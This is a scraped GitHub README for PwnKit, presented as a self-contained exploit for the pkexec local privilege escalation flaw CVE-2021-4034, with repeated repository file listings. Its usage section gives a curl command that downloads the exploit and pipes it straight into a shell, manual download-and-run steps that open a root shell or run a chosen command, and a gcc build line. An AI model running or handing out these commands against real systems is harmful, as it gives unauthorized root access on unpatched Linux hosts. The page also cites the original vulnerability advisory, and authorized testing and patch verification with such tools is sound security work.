PwnKit

Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege Escalation

Usage

Should work out of the box on vulnerable Linux distributions based on Ubuntu, Debian, Fedora, and CentOS.

sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

Manually

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x ./PwnKit
./PwnKit # interactive shell
./PwnKit 'id' # single command

Patched

Running the exploit against patched versions will yield the following output.

Build

gcc -shared PwnKit.c -o PwnKit -Wl,-e,entry -fPIC

Technical Details

https://blog.qualys.com/vulnerabilities-threat-research/2022/01/25/pwnkit-local-privilege-escalation-vulnerability-discovered-in-polkits-pkexec-cve-2021-4034

References

https://github.com/arthepsy/CVE-2021-4034/

Name		Name	Last commit message	Last commit date
Latest commit History 10 Commits
imgs		imgs
LICENSE		LICENSE
Makefile		Makefile
PwnKit		PwnKit
PwnKit.c		PwnKit.c
PwnKit.sh		PwnKit.sh
PwnKit32		PwnKit32
README.md		README.md

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

imgs

imgs

LICENSE

LICENSE

Makefile

Makefile

PwnKit

PwnKit

PwnKit.c

PwnKit.c

PwnKit.sh

PwnKit.sh

PwnKit32

PwnKit32

README.md

README.md

Repository files navigation

PwnKit

Usage

Manually

Patched

Build

Technical Details

References

About

Contributors 2

Languages

License

ly4k/PwnKit

Folders and files

Latest commit

History

Repository files navigation

PwnKit

Usage

Manually

Patched

Build

Technical Details

References

About

Topics

Resources

License

Stars

Watchers

Forks

Languages